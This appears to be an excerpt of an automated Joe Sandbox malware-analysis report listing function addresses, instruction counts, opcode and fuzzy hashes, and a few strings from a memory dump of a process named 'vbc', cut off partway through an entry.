                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @
                                                                • API String ID: 0-2766056989
                                                                • Opcode ID: 82e9b14cf91a5a6f37c9e4009f2ae5fbb7a03b243ebd8f8edba72d545418d4d2
                                                                • Instruction ID: 9806fe94d7c01f3a86667867acfea1a9f6f64e98dbf5a45b1ff907972e9c0aac
                                                                • Opcode Fuzzy Hash: 82e9b14cf91a5a6f37c9e4009f2ae5fbb7a03b243ebd8f8edba72d545418d4d2
                                                                • Instruction Fuzzy Hash: 89317271118345AFD311DF14C849E6BBBE8FF85750F444A1EF99583290E7B0E948CB96
                                                                Function 055F8CB1 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: WindowsExcludedProcs
                                                                • API String ID: 0-3583428290
                                                                • Opcode ID: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                                • Instruction ID: 239cf2a2ba806a4b6458976ff63c864f977a88f3caa751ed183d872b407eda06
                                                                • Opcode Fuzzy Hash: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                                • Instruction Fuzzy Hash: C7212637600115ABCB22DA54C844F6FB7BEBF91AA0F054526BA06DF314D630DD01CBA0
                                                                Function 05686FF7 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Critical error detected %lx, xrefs: 05687027
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Critical error detected %lx
                                                                • API String ID: 0-802127002
                                                                • Opcode ID: 015ded51fc1ec6c5866a4f4e0581e22dce9d6db21d1a71e502e8e63af9f16f1b
                                                                • Instruction ID: d403ef97da83cefeec280be426ca2db1115e0fc8435d616882804f32cecd0800
                                                                • Opcode Fuzzy Hash: 015ded51fc1ec6c5866a4f4e0581e22dce9d6db21d1a71e502e8e63af9f16f1b
                                                                • Instruction Fuzzy Hash: 451179B6E443088BDB25EFA4D805BEDFBB1FB04718F20422ED055AB281D7760901CF14
                                                                Function 05672000 Relevance: .8, Instructions: 757COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4954f0f853b0be9db8f88046e1003f7d24ab4d0556e380645897819d9f734b55
                                                                • Instruction ID: c6ab704ea7b8c5e8ef8c1f2ffd2fa56fe81bfc68990d97654d2ae72644330f6a
                                                                • Opcode Fuzzy Hash: 4954f0f853b0be9db8f88046e1003f7d24ab4d0556e380645897819d9f734b55
                                                                • Instruction Fuzzy Hash: 6642D27A6083499BDB25CF64C8A0A7FB7E6BF88700F18092DFA8297750D731D945CB52
                                                                Function 05668158 Relevance: .6, Instructions: 617COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 67b50ee5a19b71167316c1121c5918814a26a8720986e7e79cb60a45db00290e
                                                                • Instruction ID: 25485d80265dcee8ed389628d54e80106b6a6596e4b741379c12de88600f94da
                                                                • Opcode Fuzzy Hash: 67b50ee5a19b71167316c1121c5918814a26a8720986e7e79cb60a45db00290e
                                                                • Instruction Fuzzy Hash: C9423B75E102199FDB24CF69C881BADBBF6BF88300F158199E949EB341DB34A985CF50
                                                                Function 0567A118 Relevance: .6, Instructions: 591COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 07cdd0abbd82e3f134bbb3f028d04e396a3f43a5a98e964a274559a2da75fe85
                                                                • Instruction ID: 41444f2f8edc376df2de310f1f81fd3cd5ab81b367162ca35de8ffb6f4a277e4
                                                                • Opcode Fuzzy Hash: 07cdd0abbd82e3f134bbb3f028d04e396a3f43a5a98e964a274559a2da75fe85
                                                                • Instruction Fuzzy Hash: C522C0742086598BDB24CFA9C09477AB7F2BF44300F188599E897CFB85E735E492CB64
                                                                Function 055F8DBF Relevance: .6, Instructions: 554COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a53a09ef7f91b1668da32a2607ff915fffbc73b0ec707111fea666a64407fc46
                                                                • Instruction ID: c234ff3a37de54e2d80a9e5961c4dcac14dc998437c0c86c25ef5c2dad76096d
                                                                • Opcode Fuzzy Hash: a53a09ef7f91b1668da32a2607ff915fffbc73b0ec707111fea666a64407fc46
                                                                • Instruction Fuzzy Hash: C0224E70E0421AEFDB15CF95C481ABEFBF6BF44344B14845AE945AB241E734ED81CBA4
                                                                Function 055D65D0 Relevance: .4, Instructions: 383COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1f7826d610f830738f9342acfd25d829f74564ad403dbc35f3fc4785bcecca94
                                                                • Instruction ID: 6e9d841f733905997a05d45686203c562f1d47f6203499d60873723a455fd601
                                                                • Opcode Fuzzy Hash: 1f7826d610f830738f9342acfd25d829f74564ad403dbc35f3fc4785bcecca94
                                                                • Instruction Fuzzy Hash: 8DE17076608341CFC724CF28C590A6AFBE1FF89314F05896DE8958B351DB31E946CBA2
                                                                Function 055C8397 Relevance: .4, Instructions: 380COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 035cb1b0d7acc09ce396a3ba193fff1ba18306071a0315c31131e21aa8f050d7
                                                                • Instruction ID: 0f082bc5b134b5369c552587db86132d33ed567334bae1886d97d975480cbbcf
                                                                • Opcode Fuzzy Hash: 035cb1b0d7acc09ce396a3ba193fff1ba18306071a0315c31131e21aa8f050d7
                                                                • Instruction Fuzzy Hash: 5CD1A471B006169FCB14DFA4C890EBABBE6FF84314F0485ADE956DB290E734E945CB90
                                                                Function 05666E20 Relevance: .4, Instructions: 379COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5d53ac450fdc87d298f844aafb6fd80491d570caebd3ac59718b1542b873e4f4
                                                                • Instruction ID: df582e4b5e6a50772a2616dc3c7bdac40b4a76b371b4f2e600d6c15bbcf21e4b
                                                                • Opcode Fuzzy Hash: 5d53ac450fdc87d298f844aafb6fd80491d570caebd3ac59718b1542b873e4f4
                                                                • Instruction Fuzzy Hash: BAE12C70E0425A9BCF14CFA9D890ABEBBF6FF49244F18815AE845A7741E335D941CBA0
                                                                Function 055FEF28 Relevance: .3, Instructions: 347COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8a56729d013c8d4a1acbcb9152bff0477c3b222d5a0b19c51fbc955767d773de
                                                                • Instruction ID: feb878bc88b0cfab17f0c2109bc81d3614ec52b40339b05318fc1872d241ae52
                                                                • Opcode Fuzzy Hash: 8a56729d013c8d4a1acbcb9152bff0477c3b222d5a0b19c51fbc955767d773de
                                                                • Instruction Fuzzy Hash: 97E1F375D00608DFCB25CFA9C984AADBBF6FF48314F14492AE646A7760D770A941CF50
                                                                Function 05658243 Relevance: .3, Instructions: 322COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                • Instruction ID: 33a47ca86f4a0cdb031f62dbd15e08e53a8cadc91e6188749ac36f75a73b3ca7
                                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                • Instruction Fuzzy Hash: 60B18174B40605AFDF34DFA4C944EABBBBABF84324F60445DAD4297B90DA34E906CB50
                                                                Function 055E0535 Relevance: .3, Instructions: 300COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                • Instruction ID: 7d46afdba2b9bed269ad85fd5ff09e20450009937c9d323a45009a2911ce02d1
                                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                • Instruction Fuzzy Hash: D4B13331704645AFDF29DBA8C858BBEBBF6BF84300F180599D5529B391DB70E942CB90
                                                                Function 055F0DE1 Relevance: .3, Instructions: 295COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9bf227b35fdf2abbca48a1c428eef1d88b38eebc8f3d844dcb8f1cd226632dcf
                                                                • Instruction ID: f4b8f3e2bb3648ba1c704749335b134a09807bc9b68017e6c3ef5036b170d82c
                                                                • Opcode Fuzzy Hash: 9bf227b35fdf2abbca48a1c428eef1d88b38eebc8f3d844dcb8f1cd226632dcf
                                                                • Instruction Fuzzy Hash: 4EC14E70E04249DFDB25DFE8C888AADBBB6FF84304F14452DE506AB395D771A941CB90
                                                                Function 055D83C0 Relevance: .3, Instructions: 281COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 41f58f17f543f556e944819c1a123f9f7642d66e9e749bef57d980575d56c8cf
                                                                • Instruction ID: 82dfcbe7a6a770b267cdfa06285cd3217fa9d7756266977ad0aa4f85d0d02a4d
                                                                • Opcode Fuzzy Hash: 41f58f17f543f556e944819c1a123f9f7642d66e9e749bef57d980575d56c8cf
                                                                • Instruction Fuzzy Hash: 21C166716083419FD764CF19C495BAAB7E5BF88304F44496DE9898B390E774E908CFA2
                                                                Function 055CC427 Relevance: .3, Instructions: 280COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 88b30215346f6f122180404f6fd341e758a87a3ce1442275d571545c9a9838ff
                                                                • Instruction ID: c55a5df0bbba406b31ca913c8effff8f6db8ea33450fbd87a6a0661b3b24f3b7
                                                                • Opcode Fuzzy Hash: 88b30215346f6f122180404f6fd341e758a87a3ce1442275d571545c9a9838ff
                                                                • Instruction Fuzzy Hash: 09B16C70B006658FDB24CFA4C994BA9B7B2BF44700F0485EDD41EA7280EB749D85CF24
                                                                Function 055FE5E7 Relevance: .3, Instructions: 278COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9b590bcbea87dfabe5960975e25efe57ea3231f55aaca0924e0460b65b1717d8
                                                                • Instruction ID: 1b071352ce67b6946cf7f741eada3e2d1d0f5029e33c57ad64d546e2639c2f21
                                                                • Opcode Fuzzy Hash: 9b590bcbea87dfabe5960975e25efe57ea3231f55aaca0924e0460b65b1717d8
                                                                • Instruction Fuzzy Hash: 6AA13A31E446589FDB21DB58C84AFBEBBB9BF00754F050125EA01AB7A0DB78AD40CBD5
                                                                Function 05610185 Relevance: .3, Instructions: 276COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 51c6c023444d9ccf7b0e06f93c36b507abbbfce73888b389d7e58f7b1d1a7ca8
                                                                • Instruction ID: 53819daf6acd675a6d68d9c740a9fea4a4d0304737ed1cc54a9edc2ffe7ff4e4
                                                                • Opcode Fuzzy Hash: 51c6c023444d9ccf7b0e06f93c36b507abbbfce73888b389d7e58f7b1d1a7ca8
                                                                • Instruction Fuzzy Hash: ABA1B070B0061ADBDF24CF65C594BBAB7B2FF54324F084129EE4597781DB34A892CB94
                                                                Function 056A4500 Relevance: .3, Instructions: 275COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0a7ab8dff1e59a7df4e2c81421a11edba752ca4fcac32c77d187d2736ed6b61a
                                                                • Instruction ID: c6922acdb5ab538ac1d739ebaaaad9c7d77f9ec732fd4f1821558f5e3d33815b
                                                                • Opcode Fuzzy Hash: 0a7ab8dff1e59a7df4e2c81421a11edba752ca4fcac32c77d187d2736ed6b61a
                                                                • Instruction Fuzzy Hash: 13A1CC72A14241AFCB15DF18CD80B2ABBEAFF88305F050928E5499B750DBB0EC41CF95
                                                                Function 056560E0 Relevance: .3, Instructions: 264COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4791466482757e30938b5e4427654448873fd594832f7c81173a6883956656f9
                                                                • Instruction ID: c97848c5ade2775aa357605f3fce4203c542618097b36ae8065f6c5972631e93
                                                                • Opcode Fuzzy Hash: 4791466482757e30938b5e4427654448873fd594832f7c81173a6883956656f9
                                                                • Instruction Fuzzy Hash: 41919371E44216AFDF25CF68D884BBEBBB5BF48720F554159EA11AB340D734E900CBA0
                                                                Function 055EE3F0 Relevance: .3, Instructions: 261COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e6555c6231e00c54e15590754504fcfc66423b8dfdb424b0c27c40af3d02955b
                                                                • Instruction ID: 2975ed1915c16006e3c8b01fa3d6888814a592f0cc31ebe29701ca7733efed81
                                                                • Opcode Fuzzy Hash: e6555c6231e00c54e15590754504fcfc66423b8dfdb424b0c27c40af3d02955b
                                                                • Instruction Fuzzy Hash: EF912531B146168BD728DF68C486B7E77AAFF84710F05446AE806DB380EB74DD42CB91
                                                                Function 055C6D10 Relevance: .2, Instructions: 216COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2966ab642faab8c6996e377ddd3ffcb70057f1f425f0254891ffc88f00f94d39
                                                                • Instruction ID: 16696b5e36f49d9ae749f0290f6408cedca27ed502c60082ad8e2b2ad4e21eb7
                                                                • Opcode Fuzzy Hash: 2966ab642faab8c6996e377ddd3ffcb70057f1f425f0254891ffc88f00f94d39
                                                                • Instruction Fuzzy Hash: 65717C75704A229BDB20DE25C980B7AB7E9BB84350F044929E95AD7700E730E985CF92
                                                                Function 0560E284 Relevance: .2, Instructions: 212COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bf3e9fdfe0ad9443e50a058d5dca073801004762be7f1f550f7ae95587d64109
                                                                • Instruction ID: 2d55f7af30d1c4e8b86f74e39cff778e720f32d8a4879791298a684b69798604
                                                                • Opcode Fuzzy Hash: bf3e9fdfe0ad9443e50a058d5dca073801004762be7f1f550f7ae95587d64109
                                                                • Instruction Fuzzy Hash: 9F818171A04619AFDB29CFA5C880AEFBBBAFF48350F10482DE555A7350D731AC45CB60
                                                                Function 055EC640 Relevance: .2, Instructions: 206COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b55c601d95996638f0691c3e34f4c0316e631580972ccd6fb4ff065089bc62d8
                                                                • Instruction ID: 62d40251d0303558fcee9fb63944f89c222da691ef581a2500bf78443a73ec8e
                                                                • Opcode Fuzzy Hash: b55c601d95996638f0691c3e34f4c0316e631580972ccd6fb4ff065089bc62d8
                                                                • Instruction Fuzzy Hash: 6071A9B5905669DBCB29CF58C991BFEBBB2FF48710F14451AE842AB350E7749800CBA0
                                                                Function 05668D6B Relevance: .2, Instructions: 206COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2e61c80d1a15a4d9c43a16fa36005957d94f5de40f50f697268d5f8980926455
                                                                • Instruction ID: 3c7c46659ecadf2707815caa491b9915438affdc23059a8c2b618295880dce74
                                                                • Opcode Fuzzy Hash: 2e61c80d1a15a4d9c43a16fa36005957d94f5de40f50f697268d5f8980926455
                                                                • Instruction Fuzzy Hash: E671C274A04256AFCB14CF69C840ABEBBF6FF89304F048059E895DB352E335EA45C7A4
                                                                Function 056847A0 Relevance: .2, Instructions: 202COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e38ae0efbe9daa25054b3682de4ee2dddb2b1c4315c5520e4f39b9056b403514
                                                                • Instruction ID: 077e2d4d96468b18933f56ae45de48f7734cd7179f5d7d98c77868c5168d05f9
                                                                • Opcode Fuzzy Hash: e38ae0efbe9daa25054b3682de4ee2dddb2b1c4315c5520e4f39b9056b403514
                                                                • Instruction Fuzzy Hash: AC71AF70A1421AEFCF20EF99D945A7ABFF9FF84305F01529AE511AB258DF319900CB58
                                                                Function 055E260B Relevance: .2, Instructions: 201COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: df05fdecfe0b0ddc5c654d9962939ee80233f57d27d1a80b3465afcb9381b0a0
                                                                • Instruction ID: 17efd447ca4a81cf88cc93a8da50525170d3ed11be66316494b5de2d6dc719a2
                                                                • Opcode Fuzzy Hash: df05fdecfe0b0ddc5c654d9962939ee80233f57d27d1a80b3465afcb9381b0a0
                                                                • Instruction Fuzzy Hash: C671E279B042429FC315DF28C484B3AB7EAFF85310F0585AAE899CB355DB74D845CBA1
                                                                Function 0565035C Relevance: .2, Instructions: 198COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                • Instruction ID: 9eba1d3fd149c0949f79072879c60eee7aefec086188f4df2785af539627b6ff
                                                                • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                • Instruction Fuzzy Hash: AD717E71A00609EFCB14DFA5C988FEEBBB8FF88724F144569E945A7250DB30EA41CB54
                                                                Function 056662A0 Relevance: .2, Instructions: 198COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3e4f9fe9e3153cf71126fbd235921f516dd1754b0d5e2b32f889d81faa96b5c4
                                                                • Instruction ID: 7a5b68442376fcc1012a7bdc080f35fb106baaedb6d6ed89bd9b01e776d2afce
                                                                • Opcode Fuzzy Hash: 3e4f9fe9e3153cf71126fbd235921f516dd1754b0d5e2b32f889d81faa96b5c4
                                                                • Instruction Fuzzy Hash: C671F032200B01AFDB32CF14D854F6ABBB6FF40764F148A28E6579B6A0DB75E944CB54
                                                                Function 0560CDB1 Relevance: .2, Instructions: 197COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e33f5219790713970029d08b6ea011e61761f96eb753443b17c119c020c792d6
                                                                • Instruction ID: 333cf49e3b18c5858846e46fd0066538aa6e21eb4fc1db950152a23950a87f87
                                                                • Opcode Fuzzy Hash: e33f5219790713970029d08b6ea011e61761f96eb753443b17c119c020c792d6
                                                                • Instruction Fuzzy Hash: 5B61CC71A00205DFDB18DF68C885ABEBBB6FF48310F14566AE612EB290DB709D42CF54
                                                                Function 056A8324 Relevance: .2, Instructions: 192COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 78cfa3aabfb0246a64f1521fdb73e1082454e1770358b53a8e21f1d8cbf51bee
                                                                • Instruction ID: 8013977a2b216d133bdcf4d3d11f1e067869faf7749c05bfd41e7b865ba9981c
                                                                • Opcode Fuzzy Hash: 78cfa3aabfb0246a64f1521fdb73e1082454e1770358b53a8e21f1d8cbf51bee
                                                                • Instruction Fuzzy Hash: 407118B6E00209AFDB15DB94C895FEEBBB9FF04350F104169EA11A7290E774AE05CF94
                                                                Function 055CCF50 Relevance: .2, Instructions: 190COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c039dac4d0c79e4adae2489b980ce8c838fb626483c5f982736a6a658be53934
                                                                • Instruction ID: 7c5622137da9ac95c0b840a8b6d8f7c957743a0b99a24b37d33d78b23a7c6b12
                                                                • Opcode Fuzzy Hash: c039dac4d0c79e4adae2489b980ce8c838fb626483c5f982736a6a658be53934
                                                                • Instruction Fuzzy Hash: CF717E71554B528FD7318FA4C544B32BBF2BF81761F540AADD9E646AE1E3B0A881CF80
                                                                Function 0568A250 Relevance: .2, Instructions: 184COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
